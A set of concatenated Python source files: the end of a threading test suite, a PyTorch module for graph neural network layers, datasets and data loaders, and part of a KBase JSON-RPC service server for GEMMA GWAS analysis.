_thread.interrupt_main()
signal.signal(signal.SIGINT, signal.SIG_DFL)
_thread.interrupt_main()
finally:
# Restore original handler
signal.signal(signal.SIGINT, handler)
class AtexitTests(unittest.TestCase):
def test_atexit_output(self):
rc, out, err = assert_python_ok("-c", """if True:
import threading
def run_last():
print('parrot')
threading._register_atexit(run_last)
""")
self.assertFalse(err)
self.assertEqual(out.strip(), b'parrot')
def test_atexit_called_once(self):
rc, out, err = assert_python_ok("-c", """if True:
import threading
from unittest.mock import Mock
mock = Mock()
threading._register_atexit(mock)
mock.assert_not_called()
# force early shutdown to ensure it was called once
threading._shutdown()
mock.assert_called_once()
""")
self.assertFalse(err)
def test_atexit_after_shutdown(self):
# The only way to do this is by registering an atexit within
# an atexit, which is intended to raise an exception.
rc, out, err = assert_python_ok("-c", """if True:
import threading
def func():
pass
def run_last():
threading._register_atexit(func)
threading._register_atexit(run_last)
""")
self.assertTrue(err)
self.assertIn("RuntimeError: can't register atexit after shutdown",
err.decode())
if __name__ == "__main__":
unittest.main()
|
nn.py
|
r"""
Neural network modules, datasets & data loaders, and other utilities
"""
import collections
import functools
import multiprocessing
import operator
import os
import queue
import signal
from math import ceil, sqrt
from typing import Any, Hashable, List, Mapping, Optional, Tuple
import numpy as np
import pynvml
import scipy.sparse
import torch
import torch.nn.functional as F
from torch.nn.modules.batchnorm import _NormBase
from ..num import vertex_degrees
from ..typehint import Array, RandomState
from ..utils import config, get_rs, logged, processes
#-------------------------- Neural network modules -----------------------------
class GraphConv(torch.nn.Module):
r"""
Graph convolution (propagation only)
"""
def forward(
self, input: torch.Tensor, eidx: torch.Tensor,
enorm: torch.Tensor, esgn: torch.Tensor
) -> torch.Tensor:
r"""
Forward propagation
Parameters
----------
input
Input data (:math:`n_{vertices} \times n_{features}`)
eidx
Vertex indices of edges (:math:`2 \times n_{edges}`)
enorm
Normalized weight of edges (:math:`n_{edges}`)
esgn
Sign of edges (:math:`n_{edges}`)
Returns
-------
result
Graph convolution result (:math:`n_{vertices} \times n_{features}`)
"""
sidx, tidx = eidx # source index and target index
message = input[sidx] * (esgn * enorm).unsqueeze(1) # n_edges * n_features
res = torch.zeros_like(input)
tidx = tidx.unsqueeze(1).expand_as(message) # n_edges * n_features
res.scatter_add_(0, tidx, message)
return res
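# --- Illustrative sketch (not part of the original module): a minimal GraphConv
# call on a hypothetical 3-vertex toy graph with two edges, included only to
# show the expected tensor shapes and dtypes.
def _example_graph_conv() -> torch.Tensor:
    conv = GraphConv()
    x = torch.eye(3)                       # n_vertices x n_features
    eidx = torch.tensor([[0, 1], [1, 2]])  # 2 x n_edges (row 0 = source, row 1 = target)
    enorm = torch.ones(2)                  # normalized edge weights
    esgn = torch.ones(2)                   # edge signs in {-1, +1}
    return conv(x, eidx, enorm, esgn)      # n_vertices x n_features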
class GraphAttent(torch.nn.Module): # pragma: no cover
r"""
Graph attention
Parameters
----------
in_features
Input dimensionality
out_features
Output dimensionality
Note
----
**EXPERIMENTAL**
"""
def __init__(self, in_features: int, out_features: int) -> None:
super().__init__()
self.weight = torch.nn.ParameterDict({
"pos": torch.nn.Parameter(torch.Tensor(out_features, in_features)),
"neg": torch.nn.Parameter(torch.Tensor(out_features, in_features))
})
self.head = torch.nn.ParameterDict({
"pos": torch.nn.Parameter(torch.zeros(out_features * 2)),
"neg": torch.nn.Parameter(torch.zeros(out_features * 2))
})
torch.nn.init.kaiming_uniform_(self.weight["pos"], sqrt(5)) # Following torch.nn.Linear
torch.nn.init.kaiming_uniform_(self.weight["neg"], sqrt(5)) # Following torch.nn.Linear
def forward(
self, input: torch.Tensor, eidx: torch.Tensor,
ewt: torch.Tensor, esgn: torch.Tensor
) -> torch.Tensor:
r"""
Forward propagation
Parameters
----------
input
Input data (:math:`n_{vertices} \times n_{features}`)
eidx
Vertex indices of edges (:math:`2 \times n_{edges}`)
ewt
Weight of edges (:math:`n_{edges}`)
esgn
Sign of edges (:math:`n_{edges}`)
Returns
-------
result
Graph attention result (:math:`n_{vertices} \times n_{features}`)
"""
res_dict = {}
for sgn in ("pos", "neg"):
mask = esgn == 1 if sgn == "pos" else esgn == -1
sidx, tidx = eidx[:, mask]
ptr = input @ self.weight[sgn].T
alpha = torch.cat([ptr[sidx], ptr[tidx]], dim=1) @ self.head[sgn]
alpha = F.leaky_relu(alpha, negative_slope=0.2).exp() * ewt[mask]
normalizer = torch.zeros(ptr.shape[0], device=ptr.device)
normalizer.scatter_add_(0, tidx, alpha)
alpha = alpha / normalizer[tidx] # Only entries with non-zero denominators will be used
message = ptr[sidx] * alpha.unsqueeze(1)
res = torch.zeros_like(ptr)
tidx = tidx.unsqueeze(1).expand_as(message)
res.scatter_add_(0, tidx, message)
res_dict[sgn] = res
return res_dict["pos"] + res_dict["neg"]
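# --- Illustrative sketch (not part of the original module): calling the
# experimental GraphAttent layer on the same hypothetical toy graph. Only the
# positive branch receives edges here; the negative branch sees an empty mask.
def _example_graph_attent() -> torch.Tensor:
    attent = GraphAttent(in_features=3, out_features=4)
    x = torch.eye(3)
    eidx = torch.tensor([[0, 1], [1, 2]])
    ewt = torch.ones(2)
    esgn = torch.ones(2)
    return attent(x, eidx, ewt, esgn)      # n_vertices x out_features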
#------------------------------- Data handlers ---------------------------------
@logged
class Dataset(torch.utils.data.Dataset):
r"""
Abstract dataset interface extending that of :class:`torch.utils.data.Dataset`
Parameters
----------
getitem_size
Unitary fetch size for each __getitem__ call
"""
def __init__(self, getitem_size: int = 1) -> None:
super().__init__()
self.getitem_size = getitem_size
self.shuffle_seed: Optional[int] = None
self.seed_queue: Optional[multiprocessing.Queue] = None
self.propose_queue: Optional[multiprocessing.Queue] = None
self.propose_cache: Mapping[int, Any] = {}
@property
def has_workers(self) -> bool:
r"""
Whether background shuffling workers have been registered
"""
self_processes = processes[id(self)]
pl = bool(self_processes)
sq = self.seed_queue is not None
pq = self.propose_queue is not None
if not pl == sq == pq:
raise RuntimeError("Background shuffling seems broken!")
return pl and sq and pq
def prepare_shuffle(self, num_workers: int = 1, random_seed: int = 0) -> None:
r"""
Prepare dataset for custom shuffling
Parameters
----------
num_workers
Number of background workers for data shuffling
random_seed
Initial random seed (will increase by 1 with every shuffle call)
"""
if self.has_workers:
self.clean()
self_processes = processes[id(self)]
self.shuffle_seed = random_seed
if num_workers:
self.seed_queue = multiprocessing.Queue()
self.propose_queue = multiprocessing.Queue()
for i in range(num_workers):
p = multiprocessing.Process(target=self.shuffle_worker)
p.start()
self.logger.debug("Started background process: %d", p.pid)
self_processes[p.pid] = p
self.seed_queue.put(self.shuffle_seed + i)
def shuffle(self) -> None:
r"""
Custom shuffling
"""
if self.has_workers:
self_processes = processes[id(self)]
self.seed_queue.put(self.shuffle_seed + len(self_processes)) # Look ahead
while self.shuffle_seed not in self.propose_cache:
shuffle_seed, shuffled = self.propose_queue.get()
self.propose_cache[shuffle_seed] = shuffled
self.accept_shuffle(self.propose_cache.pop(self.shuffle_seed))
else:
self.accept_shuffle(self.propose_shuffle(self.shuffle_seed))
self.shuffle_seed += 1
def shuffle_worker(self) -> None:
r"""
Background shuffle worker
"""
signal.signal(signal.SIGINT, signal.SIG_IGN)
while True:
seed = self.seed_queue.get()
if seed is None:
self.propose_queue.put((None, os.getpid()))
break
self.propose_queue.put((seed, self.propose_shuffle(seed)))
def propose_shuffle(self, seed: int) -> Any:
r"""
Propose shuffling using a given random seed
Parameters
----------
seed
Random seed
Returns
-------
shuffled
Shuffled result
"""
raise NotImplementedError # pragma: no cover
def accept_shuffle(self, shuffled: Any) -> None:
r"""
Accept shuffling result
Parameters
----------
shuffled
Shuffled result
"""
raise NotImplementedError # pragma: no cover
def clean(self) -> None:
r"""
Clean up multi-process resources used in custom shuffling
"""
self_processes = processes[id(self)]
if not self.has_workers:
return
for _ in self_processes:
self.seed_queue.put(None)
self.propose_cache.clear()
while self_processes:
try:
first, second = self.propose_queue.get(
timeout=config.FORCE_TERMINATE_WORKER_PATIENCE
)
except queue.Empty:
break
if first is not None:
continue
pid = second
self_processes[pid].join()
self.logger.debug("Joined background process: %d", pid)
del self_processes[pid]
for pid in list(self_processes.keys()): # If some background processes failed to exit gracefully
self_processes[pid].terminate()
self_processes[pid].join()
self.logger.debug("Terminated background process: %d", pid)
del self_processes[pid]
self.propose_queue = None
self.seed_queue = None
def __del__(self) -> None:
self.clean()
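# --- Illustrative sketch (not part of the original module): the minimal subclass
# contract. `_ListDataset` is a hypothetical example type showing how
# propose_shuffle/accept_shuffle cooperate with shuffle(); with
# prepare_shuffle(num_workers=0) the shuffling runs in-process and no background
# workers are spawned.
class _ListDataset(Dataset):
    def __init__(self, data: List[int]) -> None:
        super().__init__()
        self.data = list(data)
    def __len__(self) -> int:
        return len(self.data)
    def __getitem__(self, index: int) -> int:
        return self.data[index]
    def propose_shuffle(self, seed: int) -> List[int]:
        rs = get_rs(seed)  # reuse the module's random-state helper
        return [self.data[i] for i in rs.permutation(len(self.data))]
    def accept_shuffle(self, shuffled: List[int]) -> None:
        self.data = shuffled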
@logged
class ArrayDataset(Dataset):
r"""
Dataset for :class:`numpy.ndarray` and :class:`scipy.sparse.spmatrix`
objects with grouping support. Arrays from the same group should have
the same size in the first dimension, while arrays from different groups
can have varying sizes (arrays of smaller sizes are cycled). Also, data
fetched from this dataset are automatically densified.
Parameters
----------
*arrays
An arbitrary number of data arrays
grouping
Array grouping. Arrays in the same group should have the same number of
samples. During shuffling and splitting, sample correspondence is
preserved within the same group, but not across different groups.
E.g., `grouping=[0, 1, 0, 1, 1]` indicates that arrays 0 and 2 are paired,
and arrays 1, 3 and 4 are paired. If no grouping pattern is specified,
it is assumed that all arrays are in the same group.
getitem_size
Unitary fetch size for each __getitem__ call
Note
----
We keep using arrays because sparse tensors do not support slicing.
Arrays are only converted to tensors after minibatch slicing.
"""
def __init__(
self, *arrays: Array, grouping: Optional[List[Hashable]] = None,
getitem_size: int = 1
) -> None:
super().__init__(getitem_size=getitem_size)
arrays = [
array.tocsr() if scipy.sparse.issparse(array) else np.asarray(array)
for array in arrays
]
self.arrays = arrays
self.grouping = grouping
self.size = max(self.sizes.values())
@property
def grouping(self) -> List[Hashable]:
r"""
Array grouping
"""
return self._grouping
@grouping.setter
def grouping(
self, grouping: Optional[List[Hashable]] = None
) -> None:
grouping = np.asarray(grouping or [0] * len(self.arrays))
if len(grouping) != len(self.arrays):
raise ValueError("Invalid grouping pattern!")
self._groups = collections.OrderedDict([
(g, np.where(grouping == g)[0].tolist())
for g in np.unique(grouping)
])
self._sizes = collections.OrderedDict()
for g, group in self.groups.items():
size_set = set(self.arrays[i].shape[0] for i in group)
if len(size_set) > 1:
raise ValueError(
"Paired arrays do not match in the first dimension!"
)
self.sizes[g] = size_set.pop()
if self.sizes[g] == 0:
raise ValueError("Zero-sized array is not allowed!")
self._grouping = grouping.tolist()
@property
def groups(self) -> Mapping[Hashable, List[int]]:
r"""
Indices of arrays in each group
"""
return self._groups
@property
def sizes(self) -> Mapping[Hashable, int]:
r"""
Array sizes in each group
"""
return self._sizes
def __len__(self) -> int:
return ceil(self.size / self.getitem_size)
def __getitem__(self, index: int) -> List[torch.Tensor]:
index = np.arange(
index * self.getitem_size,
min((index + 1) * self.getitem_size, self.size)
)
return [
torch.as_tensor(array[np.mod(index, array.shape[0])].toarray())
if scipy.sparse.issparse(array)
else torch.as_tensor(array[np.mod(index, array.shape[0])])
for array in self.arrays
]
def propose_shuffle(self, seed: int) -> List[Array]:
rs = get_rs(seed)
shuffled = [None] * len(self.arrays)
for g, group in self.groups.items():
permutation = rs.permutation(self.sizes[g])
for i in group:
shuffled[i] = self.arrays[i][permutation]
return shuffled
def accept_shuffle(self, shuffled: List[Array]) -> None:
self.arrays = shuffled
def random_split(
self, fractions: List[float], random_state: RandomState = None
) -> List["ArrayDataset"]:
r"""
Randomly split the dataset into multiple subdatasets according to
given fractions.
Parameters
----------
fractions
Fraction of each split
random_state
Random state
Returns
-------
subdatasets
A list of split subdatasets
"""
if min(fractions) <= 0:
raise ValueError("Fractions should be greater than 0!")
if sum(fractions) != 1:
raise ValueError("Fractions do not sum to 1!")
rs = get_rs(random_state)
cum_frac = np.cumsum(fractions)
subarrays_list = [[None] * len(self.arrays) for _ in range(len(fractions))]
for g, group in self.groups.items():
permutation = rs.permutation(self.sizes[g])
cum_idx = np.round(cum_frac * self.sizes[g]).astype(int)
split_idx = np.split(permutation, cum_idx[:-1]) # Last idx produces an extra empty split
for i, idx in enumerate(split_idx):
for j in group:
subarrays_list[i][j] = self.arrays[j][idx]
subdatasets = [
ArrayDataset(
*subarrays, grouping=self.grouping, getitem_size=self.getitem_size
) for subarrays in subarrays_list
]
return subdatasets
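# --- Illustrative sketch (not part of the original module): building an
# ArrayDataset from two paired toy arrays and splitting it 80/20. The data are
# hypothetical and only meant to show the shapes involved.
def _example_array_dataset() -> List[ArrayDataset]:
    x = np.random.randn(10, 4)
    y = np.random.randn(10, 2)
    dataset = ArrayDataset(x, y, getitem_size=4)   # one group by default
    _ = dataset[0]                                 # list of two dense tensors
    train, test = dataset.random_split([0.8, 0.2], random_state=0)
    return [train, test]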
@logged
class GraphDataset(Dataset):
r"""
Dataset for graphs with support for negative sampling
Parameters
----------
eidx
Vertex indices of edges (:math:`2 \times n_{edges}`)
ewt
Weight of edges (:math:`n_{edges}`), must be in range ``(0.0, 1.0]``.
esgn
Sign of edges (:math:`n_{edges}`)
neg_samples
Number of negative samples per edge
weighted_sampling
Whether to do negative sampling based on vertex importance
deemphasize_loops
Whether to deemphasize self-loops when computing vertex importance
getitem_size
Unitary fetch size for each __getitem__ call
Note
----
Custom shuffling performs negative sampling.
"""
def __init__(
self, eidx: np.ndarray, ewt: np.ndarray, esgn: np.ndarray,
neg_samples: int = 1, weighted_sampling: bool = True,
deemphasize_loops: bool = True, getitem_size: int = 1
) -> None:
super().__init__(getitem_size=getitem_size)
if eidx.ndim != 2 or ewt.ndim != 1 or esgn.ndim != 1 or eidx.shape[0] != 2:
raise ValueError("Invalid data shape!")
if not eidx.shape[1] == ewt.shape[0] == esgn.shape[0]:
raise ValueError("Inconsistent edge number!")
if eidx.min() < 0:
raise ValueError("Invalid edge index!")
if np.any(ewt <= 0):
raise ValueError("Invalid edge weight!")
if set(esgn).difference({-1, 1}):
raise ValueError("Invalid edge sign!")
self.eidx = eidx
self.ewt = ewt
self.esgn = esgn
self.eset = {
(i, j, s) for (i, j), s in
zip(self.eidx.T, self.esgn)
}
self.vnum = self.eidx.max() + 1
if weighted_sampling:
if deemphasize_loops:
non_loop = self.eidx[0] != self.eidx[1]
eidx = self.eidx[:, non_loop]
ewt = self.ewt[non_loop]
else:
eidx = self.eidx
ewt = self.ewt
degree = vertex_degrees(eidx, ewt, vnum=self.vnum, direction="both")
else:
degree = np.ones(self.vnum, dtype=self.ewt.dtype)
self.vprob = degree / degree.sum() # Vertex sampling probability
effective_enum = self.ewt.sum()
self.eprob = self.ewt / effective_enum # Edge sampling probability
self.effective_enum = round(effective_enum)
self.neg_samples = neg_samples
self.size = self.effective_enum * (1 + self.neg_samples)
self.samp_eidx: Optional[np.ndarray] = None
self.samp_ewt: Optional[np.ndarray] = None
self.samp_esgn: Optional[np.ndarray] = None
def __len__(self) -> int:
return ceil(self.size / self.getitem_size)
def __getitem__(self, index: int) -> List[torch.Tensor]:
index = slice(
index * self.getitem_size,
min((index + 1) * self.getitem_size, self.size)
)
return [
torch.as_tensor(self.samp_eidx[:, index]),
torch.as_tensor(self.samp_ewt[index]),
torch.as_tensor(self.samp_esgn[index])
]
def propose_shuffle(
self, seed: int
) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:
(pi, pj), pw, ps = self.eidx, self.ewt, self.esgn
rs = get_rs(seed)
psamp = rs.choice(self.ewt.size, self.effective_enum, replace=True, p=self.eprob)
pi_, pj_, pw_, ps_ = pi[psamp], pj[psamp], pw[psamp], ps[psamp]
pw_ = np.ones_like(pw_)
ni_ = np.tile(pi_, self.neg_samples)
nw_ = np.zeros(pw_.size * self.neg_samples, dtype=pw_.dtype)
ns_ = np.tile(ps_, self.neg_samples)
nj_ = rs.choice(self.vnum, pj_.size * self.neg_samples, replace=True, p=self.vprob)
remain = np.where([
item in self.eset
for item in zip(ni_, nj_, ns_)
])[0]
while remain.size: # NOTE: Potential infinite loop if graph too dense
newnj = rs.choice(self.vnum, remain.size, replace=True, p=self.vprob)
nj_[remain] = newnj
remain = remain[[
item in self.eset
for item in zip(ni_[remain], newnj, ns_[remain])
]]
idx = np.stack([np.concatenate([pi_, ni_]), np.concatenate([pj_, nj_])])
w = np.concatenate([pw_, nw_])
s = np.concatenate([ps_, ns_])
perm = rs.permutation(idx.shape[1])
return idx[:, perm], w[perm], s[perm]
def accept_shuffle(
self, shuffled: Tuple[np.ndarray, np.ndarray, np.ndarray]
) -> None:
self.samp_eidx, self.samp_ewt, self.samp_esgn = shuffled
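# --- Illustrative sketch (not part of the original module): a toy GraphDataset
# over a 3-vertex graph with two positive edges. prepare_shuffle(num_workers=0)
# keeps negative sampling in-process; shuffle() must run before indexing because
# __getitem__ reads the sampled edges.
def _example_graph_dataset() -> List[torch.Tensor]:
    eidx = np.array([[0, 1], [1, 2]])   # 2 x n_edges
    ewt = np.array([1.0, 1.0])          # weights in (0.0, 1.0]
    esgn = np.array([1, 1])             # signs in {-1, +1}
    dataset = GraphDataset(eidx, ewt, esgn, neg_samples=1, getitem_size=4)
    dataset.prepare_shuffle(num_workers=0, random_seed=0)
    dataset.shuffle()                   # draws positive and negative samples
    return dataset[0]                   # [eidx, ewt, esgn] minibatch tensors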
class DataLoader(torch.utils.data.DataLoader):
r"""
Custom data loader that manually shuffles the internal dataset before each
round of iteration (see :class:`torch.utils.data.DataLoader` for usage)
"""
def __init__(self, dataset: Dataset, **kwargs) -> None:
super().__init__(dataset, **kwargs)
self.collate_fn = self._collate
self.shuffle = kwargs["shuffle"] if "shuffle" in kwargs else False
def __iter__(self) -> "DataLoader":
if self.shuffle:
self.dataset.shuffle() # Customized shuffling
return super().__iter__()
@staticmethod
def _collate(batch):
return tuple(map(lambda x: torch.cat(x, dim=0), zip(*batch)))
class GraphDataLoader(DataLoader):
r"""
Data loader for graph datasets with a special collate function (see
:class:`torch.utils.data.DataLoader` for usage)
"""
def __init__(self, dataset: GraphDataset, **kwargs) -> None:
super().__init__(dataset, **kwargs)
@staticmethod
def _collate(batch):
eidx, ewt, esgn = zip(*batch)
eidx = torch.cat(eidx, dim=1)
ewt = torch.cat(ewt, dim=0)
esgn = torch.cat(esgn, dim=0)
return eidx, ewt, esgn
class ParallelDataLoader:
r"""
Parallel data loader
Parameters
----------
*data_loaders
An arbitrary number of data loaders
cycle_flags
Whether each data loader should be cycled in case they are of
different lengths, by default none of them are cycled.
"""
def __init__(
self, *data_loaders: DataLoader,
cycle_flags: Optional[List[bool]] = None
) -> None:
cycle_flags = cycle_flags or [False] * len(data_loaders)
if len(cycle_flags) != len(data_loaders):
raise ValueError("Invalid cycle flags!")
self.cycle_flags = cycle_flags
self.data_loaders = list(data_loaders)
self.length = len(self.data_loaders)
self.iterators = None
def __iter__(self) -> "ParallelDataLoader":
self.iterators = [iter(loader) for loader in self.data_loaders]
return self
def _next(self, i: int) -> List[torch.Tensor]:
try:
return next(self.iterators[i])
except StopIteration as e:
if self.cycle_flags[i]:
self.iterators[i] = iter(self.data_loaders[i])
return next(self.iterators[i])
raise e
def __next__(self) -> List[torch.Tensor]:
return functools.reduce(
operator.add, [self._next(i) for i in range(self.length)]
)
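# --- Illustrative sketch (not part of the original module): zipping two data
# loaders of different lengths. The shorter one is cycled, so iteration stops
# when the longer, non-cycled loader is exhausted. The datasets are toy data.
def _example_parallel_loader() -> None:
    ds_a = ArrayDataset(np.random.randn(8, 3), getitem_size=2)
    ds_b = ArrayDataset(np.random.randn(4, 5), getitem_size=2)
    loader = ParallelDataLoader(
        DataLoader(ds_a, batch_size=2),
        DataLoader(ds_b, batch_size=2),
        cycle_flags=[False, True]       # cycle the shorter loader
    )
    for batch in loader:                # batch = tensors from ds_a followed by ds_b
        pass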
#----------------------------- Utility functions -------------------------------
def freeze_running_stats(m: torch.nn.Module) -> None:
r"""
Selectively stops normalization layers from updating running stats
Parameters
----------
m
Network module
"""
if isinstance(m, _NormBase):
m.eval()
def get_default_numpy_dtype() -> type:
r"""
Get numpy dtype matching that of the pytorch default dtype
Returns
-------
dtype
Default numpy dtype
"""
return getattr(np, str(torch.get_default_dtype()).replace("torch.", ""))
@logged
@functools.lru_cache(maxsize=1)
def autodevice() -> torch.device:
r"""
Get torch computation device automatically
based on GPU availability and memory usage
Returns
-------
device
Computation device
"""
used_device = -1
if not config.CPU_ONLY:
try:
pynvml.nvmlInit()
free_mems = np.array([
pynvml.nvmlDeviceGetMemoryInfo(
pynvml.nvmlDeviceGetHandleByIndex(i)
).free for i in range(pynvml.nvmlDeviceGetCount())
])
for item in config.MASKED_GPUS:
free_mems[item] = -1
best_devices = np.where(free_mems == free_mems.max())[0]
used_device = np.random.choice(best_devices, 1)[0]
if free_mems[used_device] < 0:
used_device = -1
except pynvml.NVMLError:
pass
if used_device == -1:
autodevice.logger.info("Using CPU as computation device.")
return torch.device("cpu")
autodevice.logger.info("Using GPU %d as computation device.", used_device)
os.environ["CUDA_VISIBLE_DEVICES"] = str(used_device)
return torch.device("cuda")
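# --- Illustrative sketch (not part of the original module): typical use of the
# utility functions above, on a hypothetical model with a BatchNorm layer.
def _example_utilities() -> torch.device:
    model = torch.nn.Sequential(torch.nn.Linear(4, 4), torch.nn.BatchNorm1d(4))
    model.apply(freeze_running_stats)   # BatchNorm layers stop updating running stats
    _ = get_default_numpy_dtype()       # e.g. numpy.float32 for torch.float32
    return autodevice()                 # falls back to CPU when no usable GPU is found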
|
GEMMA_GWASServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from GEMMA_GWAS.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'GEMMA_GWAS'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from GEMMA_GWAS.GEMMA_GWASImpl import GEMMA_GWAS # noqa @IgnorePep8
impl_GEMMA_GWAS = GEMMA_GWAS(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
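# --- Illustrative sketch (not part of the original service code): the custom
# encoder lets results containing sets or frozensets be serialized by rendering
# them as JSON lists.
def _example_json_encoding():
    return json.dumps({"ids": {1, 2, 3}}, cls=JSONObjectEncoder)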
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'GEMMA_GWAS'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_GEMMA_GWAS.run_gemma_association,
name='GEMMA_GWAS.run_gemma_association',
types=[dict])
self.method_authentication['GEMMA_GWAS.run_gemma_association'] = 'required' # noqa
self.rpc_service.add(impl_GEMMA_GWAS.status,
name='GEMMA_GWAS.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
